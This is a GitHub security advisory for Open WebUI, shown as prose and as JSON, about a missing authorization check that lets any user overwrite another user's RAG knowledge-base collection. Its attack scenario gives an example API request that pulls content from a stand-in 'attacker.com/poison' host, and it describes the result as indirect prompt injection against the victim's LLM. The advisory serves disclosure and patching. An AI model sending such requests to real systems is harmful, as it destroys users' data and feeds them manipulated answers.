GHSA-7R82-QHG4-6WVJ

Vulnerability from github – Published: 2026-05-08 19:51 – Updated: 2026-05-08 19:51
VLAI?
Summary
Open WebUI has Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite
Details

Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite

Affected Component

Retrieval web/YouTube processing endpoints: - backend/open_webui/routers/retrieval.py (lines 1810-1837, process_web) - backend/open_webui/routers/retrieval.py (the parallel process_youtube endpoint) - backend/open_webui/routers/retrieval.py (line 1445, save_docs_to_vector_db call chain)

Affected Versions

Current main branch (commit 6fdd19bf1) and likely all versions with RAG/knowledge base functionality.

Description

The POST /api/v1/retrieval/process/web endpoint accepts a user-supplied collection_name and an overwrite query parameter (default: True). It performs no authorization check on whether the calling user owns or has write access to the target collection. When overwrite=True, save_docs_to_vector_db calls VECTOR_DB_CLIENT.delete_collection() on the target collection before writing new content.

Combined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user's knowledge base UUID and then destroy or poison it.

# retrieval.py:1810-1837 — no collection authorization check
@router.post('/process/web')
async def process_web(
    request: Request,
    form_data: ProcessUrlForm,
    user=Depends(get_verified_user),
    ...
):
    # ... fetch and process the URL ...
    save_docs_to_vector_db(
        request=request,
        docs=docs,
        collection_name=form_data.collection_name,  # attacker-controlled, unchecked
        overwrite=overwrite,                        # defaults to True
        ...
    )

CVSS 3.1 Breakdown

Metric Value Rationale
Attack Vector Network (N) Exploited remotely via API call
Attack Complexity Low (L) Single API call with a known KB UUID
Privileges Required Low (L) Requires any authenticated user account
User Interaction None (N) No victim interaction required
Scope Unchanged (U) Impact within the knowledge base authorization boundary
Confidentiality None (N) No data disclosure from this vulnerability directly
Integrity High (H) Complete replacement of victim's KB content with attacker-controlled data
Availability High (H) Victim's original KB embeddings are deleted; KB effectively destroyed

Attack Scenario

  1. Attacker discovers victim's KB UUID via the knowledge-bases meta-collection (separate finding) or other enumeration.
  2. Attacker sends: POST /api/v1/retrieval/process/web?overwrite=true { "url": "https://attacker.com/poison", "collection_name": "<victim_kb_uuid>" }
  3. The endpoint fetches content from the attacker's URL.
  4. save_docs_to_vector_db deletes the entire vector collection belonging to the victim's knowledge base.
  5. The attacker's fetched content is embedded and written as the new collection content.
  6. Victim's RAG queries against their KB now return attacker-controlled content instead of their original documents.

Impact

  • Data destruction: Victim's original KB embeddings are permanently deleted from the vector store
  • RAG poisoning: Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim
  • Indirect prompt injection: Poisoned content can contain crafted prompts that manipulate the victim's LLM behavior when queried
  • Persistence: The poisoned content persists until the KB is rebuilt from source files

Preconditions

  • Attacker must have a valid user account
  • Attacker must know the target collection name (KB UUID) — easily obtained via the knowledge-bases enumeration finding
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.12"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44554"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-08T19:51:14Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite\n\n## Affected Component\n\nRetrieval web/YouTube processing endpoints:\n- `backend/open_webui/routers/retrieval.py` (lines 1810-1837, `process_web`)\n- `backend/open_webui/routers/retrieval.py` (the parallel `process_youtube` endpoint)\n- `backend/open_webui/routers/retrieval.py` (line 1445, `save_docs_to_vector_db` call chain)\n\n## Affected Versions\n\nCurrent main branch (commit `6fdd19bf1`) and likely all versions with RAG/knowledge base functionality.\n\n## Description\n\nThe `POST /api/v1/retrieval/process/web` endpoint accepts a user-supplied `collection_name` and an `overwrite` query parameter (default: `True`). It performs no authorization check on whether the calling user owns or has write access to the target collection. When `overwrite=True`, `save_docs_to_vector_db` calls `VECTOR_DB_CLIENT.delete_collection()` on the target collection before writing new content.\n\nCombined with the knowledge base enumeration vulnerability (separate report), an attacker can trivially discover any user\u0027s knowledge base UUID and then destroy or poison it.\n\n```python\n# retrieval.py:1810-1837 \u2014 no collection authorization check\n@router.post(\u0027/process/web\u0027)\nasync def process_web(\n    request: Request,\n    form_data: ProcessUrlForm,\n    user=Depends(get_verified_user),\n    ...\n):\n    # ... fetch and process the URL ...\n    save_docs_to_vector_db(\n        request=request,\n        docs=docs,\n        collection_name=form_data.collection_name,  # attacker-controlled, unchecked\n        overwrite=overwrite,                        # defaults to True\n        ...\n    )\n```\n\n## CVSS 3.1 Breakdown\n\n| Metric | Value | Rationale |\n|--------|-------|-----------|\n| Attack Vector | Network (N) | Exploited remotely via API call |\n| Attack Complexity | Low (L) | Single API call with a known KB UUID |\n| Privileges Required | Low (L) | Requires any authenticated user account |\n| User Interaction | None (N) | No victim interaction required |\n| Scope | Unchanged (U) | Impact within the knowledge base authorization boundary |\n| Confidentiality | None (N) | No data disclosure from this vulnerability directly |\n| Integrity | High (H) | Complete replacement of victim\u0027s KB content with attacker-controlled data |\n| Availability | High (H) | Victim\u0027s original KB embeddings are deleted; KB effectively destroyed |\n\n## Attack Scenario\n\n1. Attacker discovers victim\u0027s KB UUID via the `knowledge-bases` meta-collection (separate finding) or other enumeration.\n2. Attacker sends:\n   ```\n   POST /api/v1/retrieval/process/web?overwrite=true\n   {\n     \"url\": \"https://attacker.com/poison\",\n     \"collection_name\": \"\u003cvictim_kb_uuid\u003e\"\n   }\n   ```\n3. The endpoint fetches content from the attacker\u0027s URL.\n4. `save_docs_to_vector_db` deletes the entire vector collection belonging to the victim\u0027s knowledge base.\n5. The attacker\u0027s fetched content is embedded and written as the new collection content.\n6. Victim\u0027s RAG queries against their KB now return attacker-controlled content instead of their original documents.\n\n## Impact\n\n- **Data destruction:** Victim\u0027s original KB embeddings are permanently deleted from the vector store\n- **RAG poisoning:** Attacker-controlled content replaces legitimate knowledge, causing the LLM to return misleading or malicious answers to the victim\n- **Indirect prompt injection:** Poisoned content can contain crafted prompts that manipulate the victim\u0027s LLM behavior when queried\n- **Persistence:** The poisoned content persists until the KB is rebuilt from source files\n\n## Preconditions\n\n- Attacker must have a valid user account\n- Attacker must know the target collection name (KB UUID) \u2014 easily obtained via the `knowledge-bases` enumeration finding",
  "id": "GHSA-7r82-qhg4-6wvj",
  "modified": "2026-05-08T19:51:14Z",
  "published": "2026-05-08T19:51:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-7r82-qhg4-6wvj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has Knowledge Base Destruction and RAG Poisoning via Unauthorized Collection Overwrite"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…